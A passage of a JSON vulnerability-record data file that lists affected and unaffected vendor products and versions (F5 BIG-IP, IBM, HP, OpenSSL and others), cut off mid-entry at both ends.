        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.213"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "infinity",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "9.0"
      },
      {
        "model": "big-ip asm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.6"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0.1"
      },
      {
        "model": "tssc/imc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "project openssl 1.0.0l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.6"
      },
      {
        "model": "netscaler application delivery controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "totalstorage san256b director model m48",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7967"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "abyp-2t-1s-1l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "big-ip afm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.68"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.0"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1.0.102"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.2"
      },
      {
        "model": "big-ip pem",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.3"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.4"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "8.0"
      },
      {
        "model": "project openssl 0.9.8p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.1.830"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8852"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "bladecenter -ht",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8750"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.15-210"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.01"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "abyp-2t-2s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "security proventia network enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "big-ip pem",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.3.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "aspera connect server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.2"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.2"
      },
      {
        "model": "big-ip ltm hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "tivoli netcool system service monitor fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.08"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.9.1"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.2"
      },
      {
        "model": "big-ip pem hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.12.201"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0.0.95"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.06"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.3"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "1.0"
      },
      {
        "model": "cognos controller fp3 if2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.11"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.8.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.7.770"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "security network controller 1.0.3379m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.6"
      },
      {
        "model": "project openssl 0.9.8za",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "abyp-0t-4s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "algo one aggregation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.9"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.0.1"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "hp-ux b.11.11 (11i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v1)"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "big-ip edge gateway 11.0.0-hf2",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "system storage san384b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "system storage san80b-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "abyp-4ts-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.07"
      },
      {
        "model": "project openssl 0.9.8q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0.0.96"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "big-ip edge gateway hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "flex system fc5022 16gb san scalable switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11150-11"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "infosphere master data management provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "algo one ase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.9"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.1"
      },
      {
        "model": "abyp-10g-4lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "abyp-10g-4lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.2.127"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.10.800"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.10"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "algo one core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.9"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.3"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-109"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.07"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.1.0"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1881"
      },
      {
        "model": "aspera orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.1"
      },
      {
        "model": "automation stratix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "rockwell",
        "version": "590015.6.3"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1768"
      },
      {
        "model": "big-ip psm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip gtm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-iq device hf3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "business intelligence enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1.1.9"
      },
      {
        "model": "algo one mag",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7"
      },
      {
        "model": "abyp-0t-0s-4l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8v"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.11"
      },
      {
        "model": "big-ip apm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aspera proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.2.2"
      },
      {
        "model": "abyp-4t-0s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.1-73"
      },
      {
        "model": "big-ip psm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "aspera connect server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.4.1"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.8.780"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.5"
      },
      {
        "model": "big-ip asm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "cognos insight",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2.4"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.4"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "sametime",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.0"
      },
      {
        "model": "big-ip psm hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aspera enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.4"
      },
      {
        "model": "project openssl 0.9.8g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "flex system fc5022 16gb san scalable switch 7.3.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "abyp-0t-2s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.41"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "integration bus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.21"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.0-14"
      },
      {
        "model": "big-ip gtm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "automation stratix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rockwell",
        "version": "59000"
      },
      {
        "model": "big-ip link controller hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "sametime community server hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.2"
      },
      {
        "model": "project openssl 0.9.8ze",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip edge gateway hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.15"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.04"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.5"
      },
      {
        "model": "big-ip webaccelerator hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "project openssl 1.0.0o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2.0.860"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "tivoli workload scheduler for applications fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.5"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "system management homepage b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5.146"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7779"
      },
      {
        "model": "big-ip gtm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "algo one core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5"
      },
      {
        "model": "sametime community server limited use",
        "scope": "eq",
        "trust": 0.3,
